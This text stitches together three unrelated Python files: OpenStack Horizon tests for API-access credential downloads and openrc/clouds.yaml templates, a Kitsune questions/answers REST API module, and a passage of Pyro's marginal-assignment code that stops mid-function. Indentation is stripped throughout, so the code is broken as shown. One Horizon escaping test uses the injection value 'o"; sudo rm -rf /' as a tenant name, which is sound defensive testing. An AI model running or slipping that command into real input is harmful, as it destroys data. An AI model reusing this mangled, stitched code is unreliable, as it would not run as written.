# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import yaml
from django import template
from django.template import loader
from django.test.utils import override_settings
from django.urls import reverse
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
INDEX_URL = reverse('horizon:project:api_access:index')
API_URL = "horizon:project:api_access"
EC2_URL = reverse(API_URL + ":ec2")
OPENRC_URL = reverse(API_URL + ":openrc")
OPENRCV2_URL = reverse(API_URL + ":openrcv2")
CREDS_URL = reverse(API_URL + ":view_credentials")
RECREATE_CREDS_URL = reverse(API_URL + ":recreate_credentials")
class APIAccessTests(test.TestCase):
@test.create_mocks({api.keystone: ('create_ec2_credentials',
'list_ec2_credentials')})
def test_ec2_download_view(self):
creds = self.ec2.first()
self.mock_list_ec2_credentials.return_value = []
self.mock_create_ec2_credentials.return_value = creds
res = self.client.get(EC2_URL)
self.assertEqual(res.status_code, 200)
self.assertEqual(res['content-type'], 'application/zip')
self.mock_list_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id)
self.mock_create_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id, self.tenant.id)
def test_openrcv2_credentials(self):
res = self.client.get(OPENRCV2_URL)
self.assertEqual(res.status_code, 200)
openrc = 'project/api_access/openrc_v2.sh.template'
self.assertTemplateUsed(res, openrc)
name = 'export OS_USERNAME="{}"'.format(self.request.user.username)
t_id = 'export OS_TENANT_ID={}'.format(self.request.user.tenant_id)
domain = 'export OS_USER_DOMAIN_NAME="{}"'.format(
self.request.user.user_domain_name)
self.assertIn(name.encode('utf-8'), res.content)
self.assertIn(t_id.encode('utf-8'), res.content)
# domain content should not be present for v2
self.assertNotIn(domain.encode('utf-8'), res.content)
@override_settings(OPENSTACK_API_VERSIONS={"identity": 3})
def test_openrc_credentials(self):
res = self.client.get(OPENRC_URL)
self.assertEqual(res.status_code, 200)
openrc = 'project/api_access/openrc.sh.template'
self.assertTemplateUsed(res, openrc)
name = 'export OS_USERNAME="{}"'.format(self.request.user.username)
p_id = 'export OS_PROJECT_ID={}'.format(self.request.user.tenant_id)
domain = 'export OS_USER_DOMAIN_NAME="{}"'.format(
self.request.user.user_domain_name)
self.assertIn(name.encode('utf-8'), res.content)
self.assertIn(p_id.encode('utf-8'), res.content)
self.assertIn(domain.encode('utf-8'), res.content)
@test.create_mocks({api.keystone: ('list_ec2_credentials',)})
def test_credential_api(self):
certs = self.ec2.list()
self.mock_list_ec2_credentials.return_value = certs
res = self.client.get(CREDS_URL)
self.assertEqual(res.status_code, 200)
credentials = 'project/api_access/credentials.html'
self.assertTemplateUsed(res, credentials)
self.assertEqual(self.user.id, res.context['openrc_creds']['user'].id)
self.assertEqual(certs[0].access,
res.context['ec2_creds']['ec2_access_key'])
self.mock_list_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id)
@test.create_mocks({api.keystone: ('create_ec2_credentials',
'list_ec2_credentials',
'delete_user_ec2_credentials')})
def _test_recreate_user_credentials(self, exists_credentials=True):
old_creds = self.ec2.list() if exists_credentials else []
new_creds = self.ec2.first()
self.mock_list_ec2_credentials.return_value = old_creds
if exists_credentials:
self.mock_delete_user_ec2_credentials.return_value = []
self.mock_create_ec2_credentials.return_value = new_creds
res_get = self.client.get(RECREATE_CREDS_URL)
self.assertEqual(res_get.status_code, 200)
credentials = \
'project/api_access/recreate_credentials.html'
self.assertTemplateUsed(res_get, credentials)
res_post = self.client.post(RECREATE_CREDS_URL)
self.assertNoFormErrors(res_post)
self.assertRedirectsNoFollow(res_post, INDEX_URL)
self.mock_list_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id)
if exists_credentials:
self.mock_delete_user_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id, old_creds[0].access)
else:
self.mock_delete_user_ec2_credentials.assert_not_called()
self.mock_create_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id, self.tenant.id)
def test_recreate_user_credentials(self):
self._test_recreate_user_credentials()
def test_recreate_user_credentials_with_no_existing_creds(self):
self._test_recreate_user_credentials(exists_credentials=False)
class ASCIITenantNameRCTests(test.TestCase):
TENANT_NAME = 'tenant'
def _setup_user(self, **kwargs):
super(ASCIITenantNameRCTests, self)._setup_user(
tenant_name=self.TENANT_NAME)
def test_openrcv2_credentials_filename(self):
expected = 'attachment; filename="%s-openrc.sh"' % self.TENANT_NAME
res = self.client.get(OPENRCV2_URL)
self.assertEqual(res.status_code, 200)
self.assertEqual(expected, res['content-disposition'])
@override_settings(OPENSTACK_API_VERSIONS={"identity": 3})
def test_openrc_credentials_filename(self):
expected = 'attachment; filename="%s-openrc.sh"' % self.TENANT_NAME
res = self.client.get(OPENRC_URL)
self.assertEqual(res.status_code, 200)
self.assertEqual(expected, res['content-disposition'])
class UnicodeTenantNameRCTests(test.TestCase):
TENANT_NAME = u'\u043f\u0440\u043e\u0435\u043a\u0442'
def _setup_user(self, **kwargs):
super(UnicodeTenantNameRCTests, self)._setup_user(
tenant_name=self.TENANT_NAME)
def test_openrcv2_credentials_filename(self):
expected = ('attachment; filename="%s-openrc.sh"' %
self.TENANT_NAME).encode('utf-8')
res = self.client.get(OPENRCV2_URL)
self.assertEqual(res.status_code, 200)
result_content_disposition = res['content-disposition']
        # We need to encode('latin-1') because the Django response object
        # has a custom setter which encodes all header values to latin-1 on Python 3.
        # https://github.com/django/django/blob/1.9.6/django/http/response.py#L142
        # See the _convert_to_charset() method for details.
if six.PY3:
result_content_disposition = result_content_disposition.\
encode('latin-1')
self.assertEqual(expected,
result_content_disposition)
@override_settings(OPENSTACK_API_VERSIONS={"identity": 3})
def test_openrc_credentials_filename(self):
expected = ('attachment; filename="%s-openrc.sh"' %
self.TENANT_NAME).encode('utf-8')
res = self.client.get(OPENRC_URL)
self.assertEqual(res.status_code, 200)
result_content_disposition = res['content-disposition']
if six.PY3:
result_content_disposition = result_content_disposition.\
encode('latin-1')
self.assertEqual(expected,
result_content_disposition)
class FakeUser(object):
username = "cool user"
class TemplateRenderTest(test.TestCase):
"""Tests for templates render."""
def test_openrc_html_escape(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": "ENG Perf R&D"}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertNotIn("&", out)
self.assertIn("ENG Perf R&D", out)
def test_openrc_html_evil_shell_escape(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": 'o"; sudo rm -rf /'}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertNotIn('o"', out)
self.assertIn('\"', out)
def test_openrc_html_evil_shell_backslash_escape(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": 'o\"; sudo rm -rf /'}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertNotIn('o\"', out)
self.assertNotIn('o"', out)
self.assertIn('\\"', out)
def test_openrc_set_region(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": "Tenant",
"region": "Colorado"}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertIn("OS_REGION_NAME=\"Colorado\"", out)
def test_openrc_region_not_set(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": "Tenant"}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertIn("OS_REGION_NAME=\"\"", out)
def test_clouds_yaml_set_region(self):
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant",
"region": "Colorado"}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertNotIn('profile', out['clouds']['openstack'])
self.assertEqual(
"http://example.com",
out['clouds']['openstack']['auth']['auth_url'])
self.assertEqual("Colorado", out['clouds']['openstack']['region_name'])
self.assertNotIn('regions', out['clouds']['openstack'])
def test_clouds_yaml_region_not_set(self):
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant"}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertNotIn('profile', out['clouds']['openstack'])
self.assertEqual(
"http://example.com",
out['clouds']['openstack']['auth']['auth_url'])
self.assertNotIn('region_name', out['clouds']['openstack'])
self.assertNotIn('regions', out['clouds']['openstack'])
def test_clouds_yaml_regions(self):
regions = ['region1', 'region2']
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant",
"regions": regions}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertNotIn('profile', out['clouds']['openstack'])
self.assertEqual(
"http://example.com",
out['clouds']['openstack']['auth']['auth_url'])
self.assertNotIn('region_name', out['clouds']['openstack'])
self.assertIn('regions', out['clouds']['openstack'])
self.assertEqual(regions, out['clouds']['openstack']['regions'])
def test_clouds_yaml_profile(self):
regions = ['region1', 'region2']
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"profile": "example",
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant",
"regions": regions}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertIn('profile', out['clouds']['openstack'])
self.assertEqual('example', out['clouds']['openstack']['profile'])
self.assertNotIn('auth_url', out['clouds']['openstack']['auth'])
self.assertNotIn('region_name', out['clouds']['openstack'])
self.assertNotIn('regions', out['clouds']['openstack'])
|
|
from datetime import datetime
import actstream.actions
import django_filters
import json
from django.contrib.contenttypes.models import ContentType
from django.db.models import Q
from rest_framework import serializers, viewsets, permissions, filters, status, pagination
from rest_framework.decorators import detail_route
from rest_framework.response import Response
from taggit.models import Tag
from kitsune.products.api_utils import TopicField
from kitsune.products.models import Product, Topic
from kitsune.questions.models import (
Question, Answer, QuestionMetaData, AlreadyTakenException,
InvalidUserException, QuestionVote, AnswerVote)
from kitsune.sumo.api_utils import (
DateTimeUTCField, OnlyCreatorEdits, GenericAPIException, SplitSourceField)
from kitsune.tags.utils import add_existing_tag
from kitsune.upload.models import ImageAttachment
from kitsune.users.api import ProfileFKSerializer
from kitsune.users.models import Profile
class QuestionMetaDataSerializer(serializers.ModelSerializer):
question = serializers.PrimaryKeyRelatedField(
required=False,
write_only=True,
queryset=Question.objects.all())
class Meta:
model = QuestionMetaData
fields = ('name', 'value', 'question')
class QuestionTagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = ('name', 'slug')
class QuestionSerializer(serializers.ModelSerializer):
answers = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
content = SplitSourceField(read_source='content_parsed', write_source='content')
created = DateTimeUTCField(read_only=True)
creator = serializers.SerializerMethodField()
involved = serializers.SerializerMethodField()
is_solved = serializers.ReadOnlyField()
is_taken = serializers.ReadOnlyField()
metadata = QuestionMetaDataSerializer(source='metadata_set', read_only=True, many=True)
num_votes = serializers.ReadOnlyField()
product = serializers.SlugRelatedField(
required=True,
slug_field='slug',
queryset=Product.objects.all())
tags = QuestionTagSerializer(read_only=True, many=True)
solution = serializers.PrimaryKeyRelatedField(read_only=True)
solved_by = serializers.SerializerMethodField()
taken_by = serializers.SerializerMethodField()
topic = TopicField(required=True, queryset=Topic.objects.all())
updated = DateTimeUTCField(read_only=True)
updated_by = serializers.SerializerMethodField()
class Meta:
model = Question
fields = (
'answers',
'content',
'created',
'creator',
'id',
'involved',
'is_archived',
'is_locked',
'is_solved',
'is_spam',
'is_taken',
'last_answer',
'locale',
'metadata',
'tags',
'num_answers',
'num_votes_past_week',
'num_votes',
'product',
'solution',
'solved_by',
'taken_until',
'taken_by',
'title',
'topic',
'updated_by',
'updated',
)
def get_involved(self, obj):
involved = set([obj.creator.profile])
involved.update(a.creator.profile for a in obj.answers.all())
return ProfileFKSerializer(involved, many=True).data
def get_solved_by(self, obj):
if obj.solution:
return ProfileFKSerializer(obj.solution.creator.profile).data
else:
return None
def get_creator(self, obj):
return ProfileFKSerializer(obj.creator.profile).data
def get_taken_by(self, obj):
if obj.taken_by:
return ProfileFKSerializer(obj.taken_by.profile).data
else:
return None
def get_updated_by(self, obj):
if obj.updated_by:
return ProfileFKSerializer(obj.updated_by.profile).data
else:
return None
def validate(self, data):
user = getattr(self.context.get('request'), 'user')
if user and not user.is_anonymous() and data.get('creator') is None:
data['creator'] = user
return data
class QuestionFKSerializer(QuestionSerializer):
class Meta:
model = Question
fields = (
'creator',
'id',
'title',
)
class QuestionFilter(django_filters.FilterSet):
product = django_filters.CharFilter(name='product__slug')
creator = django_filters.CharFilter(name='creator__username')
involved = django_filters.MethodFilter(action='filter_involved')
is_solved = django_filters.MethodFilter(action='filter_is_solved')
is_taken = django_filters.MethodFilter(action='filter_is_taken')
metadata = django_filters.MethodFilter(action='filter_metadata')
solved_by = django_filters.MethodFilter(action='filter_solved_by')
taken_by = django_filters.CharFilter(name='taken_by__username')
class Meta(object):
model = Question
fields = [
'creator',
'created',
'involved',
'is_archived',
'is_locked',
'is_solved',
'is_spam',
'is_taken',
'locale',
'num_answers',
'product',
'solved_by',
'taken_by',
'title',
'topic',
'updated',
'updated_by',
]
def filter_involved(self, queryset, username):
# This will remain unevaluated, and become a subquery of the final query.
        # Using a subquery instead of the JOIN Django would normally generate
        # should be faster in this case.
questions_user_answered = (
Answer.objects.filter(creator__username=username).values('question_id'))
answered_filter = Q(id__in=questions_user_answered)
creator_filter = Q(creator__username=username)
return queryset.filter(creator_filter | answered_filter)
def filter_is_taken(self, queryset, value):
field = serializers.BooleanField()
value = field.to_internal_value(value)
# is_taken doesn't exist. Instead, we decide if a question is taken
# based on ``taken_by`` and ``taken_until``.
now = datetime.now()
if value:
# only taken questions
return queryset.filter(~Q(taken_by=None), taken_until__gt=now)
else:
# only not taken questions
return queryset.filter(Q(taken_by=None) | Q(taken_until__lt=now))
def filter_is_solved(self, queryset, value):
field = serializers.BooleanField()
value = field.to_internal_value(value)
solved_filter = Q(solution=None)
if value:
solved_filter = ~solved_filter
return queryset.filter(solved_filter)
def filter_solved_by(self, queryset, username):
question_user_solved = (
Question.objects.filter(solution__creator__username=username).values('id'))
return queryset.filter(id__in=question_user_solved)
def filter_metadata(self, queryset, value):
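        # Expected query value (hypothetical example): ?metadata={"useragent": ["Firefox", null]}
        # i.e. a JSON object mapping metadata names to a value or a list of values,
        # where a null value matches questions with no metadata entry of that name.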
try:
value = json.loads(value)
except ValueError:
raise GenericAPIException(400, 'metadata must be valid JSON.')
for name, values in value.items():
if not isinstance(values, list):
values = [values]
query = Q()
for v in values:
if v is None:
query = query | ~Q(metadata_set__name=name)
else:
query = query | Q(metadata_set__name=name, metadata_set__value=v)
queryset = queryset.filter(query)
return queryset
class QuestionViewSet(viewsets.ModelViewSet):
serializer_class = QuestionSerializer
queryset = Question.objects.all()
pagination_class = pagination.PageNumberPagination
permission_classes = [
OnlyCreatorEdits,
permissions.IsAuthenticatedOrReadOnly,
]
filter_class = QuestionFilter
filter_backends = [
filters.DjangoFilterBackend,
filters.OrderingFilter,
]
ordering_fields = [
'id',
'created',
'last_answer',
'num_answers',
'num_votes_past_week',
'updated',
]
# Default, if not overwritten
ordering = ('-id',)
@detail_route(methods=['POST'])
def solve(self, request, pk=None):
"""Accept an answer as the solution to the question."""
question = self.get_object()
answer_id = request.data.get('answer')
try:
answer = Answer.objects.get(pk=answer_id)
except Answer.DoesNotExist:
return Response({'answer': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
question.set_solution(answer, request.user)
return Response(status=status.HTTP_204_NO_CONTENT)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def helpful(self, request, pk=None):
question = self.get_object()
if not question.editable:
raise GenericAPIException(403, 'Question not editable')
if question.has_voted(request):
raise GenericAPIException(409, 'Cannot vote twice')
QuestionVote(question=question, creator=request.user).save()
num_votes = QuestionVote.objects.filter(question=question).count()
return Response({'num_votes': num_votes})
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def follow(self, request, pk=None):
question = self.get_object()
actstream.actions.follow(request.user, question, actor_only=False, send_action=False)
return Response('', status=204)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def unfollow(self, request, pk=None):
question = self.get_object()
actstream.actions.unfollow(request.user, question, send_action=False)
return Response('', status=204)
@detail_route(methods=['POST'])
def set_metadata(self, request, pk=None):
data = {}
data.update(request.data)
data['question'] = self.get_object().pk
serializer = QuestionMetaDataSerializer(data=data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@detail_route(methods=['POST', 'DELETE'])
def delete_metadata(self, request, pk=None):
question = self.get_object()
if 'name' not in request.data:
return Response({'name': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
try:
meta = (QuestionMetaData.objects
.get(question=question, name=request.data['name']))
meta.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
except QuestionMetaData.DoesNotExist:
raise GenericAPIException(404, 'No matching metadata object found.')
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticatedOrReadOnly])
def take(self, request, pk=None):
question = self.get_object()
field = serializers.BooleanField()
force = field.to_internal_value(request.data.get('force', False))
try:
question.take(request.user, force=force)
except InvalidUserException:
raise GenericAPIException(400, 'Question creator cannot take a question.')
except AlreadyTakenException:
raise GenericAPIException(409, 'Conflict: question is already taken.')
return Response(status=204)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def add_tags(self, request, pk=None):
question = self.get_object()
if 'tags' not in request.data:
return Response({'tags': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
tags = request.data['tags']
for tag in tags:
try:
add_existing_tag(tag, question.tags)
except Tag.DoesNotExist:
if request.user.has_perm('taggit.add_tag'):
question.tags.add(tag)
else:
raise GenericAPIException(403, 'You are not authorized to create new tags.')
tags = question.tags.all()
return Response(QuestionTagSerializer(tags, many=True).data)
@detail_route(methods=['POST', 'DELETE'], permission_classes=[permissions.IsAuthenticated])
def remove_tags(self, request, pk=None):
question = self.get_object()
if 'tags' not in request.data:
return Response({'tags': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
tags = request.data['tags']
for tag in tags:
question.tags.remove(tag)
return Response(status=status.HTTP_204_NO_CONTENT)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def auto_tag(self, request, pk=None):
question = self.get_object()
question.auto_tag()
return Response(status=status.HTTP_204_NO_CONTENT)
@detail_route(methods=['POST'])
def attach_images(self, request, pk=None):
question = self.get_object()
user_ct = ContentType.objects.get_for_model(request.user)
qst_ct = ContentType.objects.get_for_model(question)
        # Move all of the images the requesting user attached on the reply form over to the question.
up_images = ImageAttachment.objects.filter(creator=request.user, content_type=user_ct)
up_images.update(content_type=qst_ct, object_id=question.id)
return Response(status=status.HTTP_204_NO_CONTENT)
class AnswerSerializer(serializers.ModelSerializer):
content = SplitSourceField(read_source='content_parsed', write_source='content')
created = DateTimeUTCField(read_only=True)
creator = serializers.SerializerMethodField()
num_helpful_votes = serializers.ReadOnlyField()
num_unhelpful_votes = serializers.ReadOnlyField()
updated = DateTimeUTCField(read_only=True)
updated_by = serializers.SerializerMethodField()
class Meta:
model = Answer
fields = (
'id',
'question',
'content',
'created',
'creator',
'updated',
'updated_by',
'is_spam',
'num_helpful_votes',
'num_unhelpful_votes',
)
def get_creator(self, obj):
return ProfileFKSerializer(Profile.objects.get(user=obj.creator)).data
def get_updated_by(self, obj):
updated_by = Profile.objects.get(user=obj.updated_by) if obj.updated_by else None
return ProfileFKSerializer(updated_by).data if updated_by else None
def validate(self, data):
user = getattr(self.context.get('request'), 'user')
if user and not user.is_anonymous() and data.get('creator') is None:
data['creator'] = user
return data
class AnswerFKSerializer(AnswerSerializer):
class Meta:
model = Answer
fields = (
'id',
'question',
'creator',
)
class AnswerFilter(django_filters.FilterSet):
creator = django_filters.CharFilter(name='creator__username')
question = django_filters.Filter(name='question__id')
class Meta(object):
model = Answer
fields = [
'question',
'creator',
'created',
'updated',
'updated_by',
'is_spam',
]
class AnswerViewSet(viewsets.ModelViewSet):
serializer_class = AnswerSerializer
queryset = Answer.objects.all()
permission_classes = [
OnlyCreatorEdits,
permissions.IsAuthenticatedOrReadOnly,
]
filter_class = AnswerFilter
filter_backends = [
filters.DjangoFilterBackend,
filters.OrderingFilter,
]
filter_fields = [
'question',
'created',
'creator',
'updated',
'updated_by',
]
ordering_fields = [
'id',
'created',
'updated',
]
# Default, if not overwritten
ordering = ('-id',)
def get_pagination_serializer(self, page):
"""
Return a serializer instance to use with paginated data.
"""
class SerializerClass(self.pagination_serializer_class):
class Meta:
object_serializer_class = AnswerSerializer
context = self.get_serializer_context()
return SerializerClass(instance=page, context=context)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def helpful(self, request, pk=None):
answer = self.get_object()
if not answer.question.editable:
raise GenericAPIException(403, 'Answer not editable')
if answer.has_voted(request):
raise GenericAPIException(409, 'Cannot vote twice')
AnswerVote(answer=answer, creator=request.user, helpful=True).save()
num_helpful_votes = AnswerVote.objects.filter(answer=answer, helpful=True).count()
num_unhelpful_votes = AnswerVote.objects.filter(answer=answer, helpful=False).count()
return Response({
'num_helpful_votes': num_helpful_votes,
'num_unhelpful_votes': num_unhelpful_votes,
})
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def follow(self, request, pk=None):
answer = self.get_object()
actstream.actions.follow(request.user, answer, actor_only=False)
return Response('', status=204)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def unfollow(self, request, pk=None):
answer = self.get_object()
actstream.actions.unfollow(request.user, answer)
return Response('', status=204)
|
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import itertools
import math
import numbers
import torch
import pyro.distributions as dist
from pyro.util import warn_if_nan
def _product(factors):
result = 1.0
for factor in factors:
result = result * factor
return result
def _exp(value):
if isinstance(value, numbers.Number):
return math.exp(value)
return value.exp()
class MarginalAssignment:
"""
Computes marginal data associations between objects and detections.
This assumes that each detection corresponds to zero or one object,
    and each object corresponds to zero or more detections. In particular,
    it does not assume detections have been partitioned into mutually
    exclusive frames, as is common in 2-D assignment problems.
:param torch.Tensor exists_logits: a tensor of shape ``[num_objects]``
representing per-object factors for existence of each potential object.
:param torch.Tensor assign_logits: a tensor of shape
``[num_detections, num_objects]`` representing per-edge factors of
assignment probability, where each edge denotes that a given detection
associates with a single object.
:param int bp_iters: optional number of belief propagation iterations. If
unspecified or ``None`` an expensive exact algorithm will be used.
:ivar int num_detections: the number of detections
:ivar int num_objects: the number of (potentially existing) objects
:ivar pyro.distributions.Bernoulli exists_dist: a mean field posterior
distribution over object existence.
:ivar pyro.distributions.Categorical assign_dist: a mean field posterior
distribution over the object (or None) to which each detection
associates. This has ``.event_shape == (num_objects + 1,)`` where the
final element denotes spurious detection, and
        ``.batch_shape == (num_detections,)``.
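    Example (a minimal sketch; the shapes and values are illustrative
    assumptions only)::

        exists_logits = torch.zeros(4)          # 4 potential objects
        assign_logits = torch.randn(3, 4)       # 3 detections x 4 objects
        marginals = MarginalAssignment(exists_logits, assign_logits, bp_iters=10)
        marginals.exists_dist.probs             # shape [4]
        marginals.assign_dist.probs             # shape [3, 5]; last column = spurious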
"""
def __init__(self, exists_logits, assign_logits, bp_iters=None):
assert exists_logits.dim() == 1, exists_logits.shape
assert assign_logits.dim() == 2, assign_logits.shape
assert assign_logits.shape[-1] == exists_logits.shape[-1]
self.num_detections, self.num_objects = assign_logits.shape
# Clamp to avoid NANs.
exists_logits = exists_logits.clamp(min=-40, max=40)
assign_logits = assign_logits.clamp(min=-40, max=40)
# This does all the work.
if bp_iters is None:
exists, assign = compute_marginals(exists_logits, assign_logits)
else:
exists, assign = compute_marginals_bp(
exists_logits, assign_logits, bp_iters
)
# Wrap the results in Distribution objects.
# This adds a final logit=0 element denoting spurious detection.
padded_assign = torch.nn.functional.pad(assign, (0, 1), "constant", 0.0)
self.assign_dist = dist.Categorical(logits=padded_assign)
self.exists_dist = dist.Bernoulli(logits=exists)
class MarginalAssignmentSparse:
"""
A cheap sparse version of :class:`MarginalAssignment`.
:param int num_detections: the number of detections
:param int num_objects: the number of (potentially existing) objects
:param torch.LongTensor edges: a ``[2, num_edges]``-shaped tensor of
(detection, object) index pairs specifying feasible associations.
:param torch.Tensor exists_logits: a tensor of shape ``[num_objects]``
representing per-object factors for existence of each potential object.
:param torch.Tensor assign_logits: a tensor of shape ``[num_edges]``
representing per-edge factors of assignment probability, where each
edge denotes that a given detection associates with a single object.
:param int bp_iters: optional number of belief propagation iterations. If
unspecified or ``None`` an expensive exact algorithm will be used.
:ivar int num_detections: the number of detections
:ivar int num_objects: the number of (potentially existing) objects
:ivar pyro.distributions.Bernoulli exists_dist: a mean field posterior
distribution over object existence.
:ivar pyro.distributions.Categorical assign_dist: a mean field posterior
distribution over the object (or None) to which each detection
associates. This has ``.event_shape == (num_objects + 1,)`` where the
final element denotes spurious detection, and
        ``.batch_shape == (num_detections,)``.
"""
def __init__(
self, num_objects, num_detections, edges, exists_logits, assign_logits, bp_iters
):
assert edges.dim() == 2, edges.shape
assert edges.shape[0] == 2, edges.shape
assert exists_logits.shape == (num_objects,), exists_logits.shape
assert assign_logits.shape == edges.shape[1:], assign_logits.shape
self.num_objects = num_objects
self.num_detections = num_detections
self.edges = edges
# Clamp to avoid NANs.
exists_logits = exists_logits.clamp(min=-40, max=40)
assign_logits = assign_logits.clamp(min=-40, max=40)
# This does all the work.
exists, assign = compute_marginals_sparse_bp(
num_objects, num_detections, edges, exists_logits, assign_logits, bp_iters
)
# Wrap the results in Distribution objects.
# This adds a final logit=0 element denoting spurious detection.
padded_assign = torch.full(
(num_detections, num_objects + 1),
-float("inf"),
dtype=assign.dtype,
device=assign.device,
)
padded_assign[:, -1] = 0
padded_assign[edges[0], edges[1]] = assign
self.assign_dist = dist.Categorical(logits=padded_assign)
self.exists_dist = dist.Bernoulli(logits=exists)
class MarginalAssignmentPersistent:
"""
This computes marginal distributions of a multi-frame multi-object
data association problem with an unknown number of persistent objects.
    The inputs are factors in a factor graph (existence probabilities for each
    potential object and assignment probabilities for each object-detection
    pair), and the outputs are marginal distributions of posterior existence
    probability of each potential object and posterior assignment probabilities
    of each object-detection pair.
    This assumes a shared (maximum) number of detections per frame; to handle
    a variable number of detections, simply set the corresponding elements of
    ``assign_logits`` to ``-float('inf')``.
:param torch.Tensor exists_logits: a tensor of shape ``[num_objects]``
representing per-object factors for existence of each potential object.
:param torch.Tensor assign_logits: a tensor of shape
``[num_frames, num_detections, num_objects]`` representing per-edge
factors of assignment probability, where each edge denotes that at a
given time frame a given detection associates with a single object.
:param int bp_iters: optional number of belief propagation iterations. If
unspecified or ``None`` an expensive exact algorithm will be used.
:param float bp_momentum: optional momentum to use for belief propagation.
Should be in the interval ``[0,1)``.
:ivar int num_frames: the number of time frames
:ivar int num_detections: the (maximum) number of detections per frame
:ivar int num_objects: the number of (potentially existing) objects
:ivar pyro.distributions.Bernoulli exists_dist: a mean field posterior
distribution over object existence.
:ivar pyro.distributions.Categorical assign_dist: a mean field posterior
distribution over the object (or None) to which each detection
associates. This has ``.event_shape == (num_objects + 1,)`` where the
final element denotes spurious detection, and
``.batch_shape == (num_frames, num_detections)``.
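    Example (illustrative shapes only; note the extra leading frame dimension
    relative to :class:`MarginalAssignment`)::

        exists_logits = torch.zeros(4)          # 4 potential objects
        assign_logits = torch.randn(2, 3, 4)    # 2 frames x 3 detections x 4 objects
        m = MarginalAssignmentPersistent(exists_logits, assign_logits,
                                         bp_iters=10, bp_momentum=0.5)
        m.exists_dist.probs                     # shape [4]
        m.assign_dist.probs                     # shape [2, 3, 5]; last column = spurious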
"""
def __init__(self, exists_logits, assign_logits, bp_iters=None, bp_momentum=0.5):
assert exists_logits.dim() == 1, exists_logits.shape
assert assign_logits.dim() == 3, assign_logits.shape
assert assign_logits.shape[-1] == exists_logits.shape[-1]
self.num_frames, self.num_detections, self.num_objects = assign_logits.shape
# Clamp to avoid NANs.
exists_logits = exists_logits.clamp(min=-40, max=40)
assign_logits = assign_logits.clamp(min=-40, max=40)
# This does all the work.
if bp_iters is None:
exists, assign = compute_marginals_persistent(exists_logits, assign_logits)
else:
exists, assign = compute_marginals_persistent_bp(
exists_logits, assign_logits, bp_iters, bp_momentum
)
# Wrap the results in Distribution objects.
# This adds a final logit=0 element denoting spurious detection.
padded_assign = torch.nn.functional.pad(assign, (0, 1), "constant", 0.0)
self.assign_dist = dist.Categorical(logits=padded_assign)
self.exists_dist = dist.Bernoulli(logits=exists)
assert self.assign_dist.batch_shape == (self.num_frames, self.num_detections)
assert self.exists_dist.batch_shape == (self.num_objects,)
def compute_marginals(exists_logits, assign_logits):
"""
This implements exact inference of pairwise marginals via
enumeration. This is very expensive and is only useful for testing.
See :class:`MarginalAssignment` for args and problem description.
"""
num_detections, num_objects = assign_logits.shape
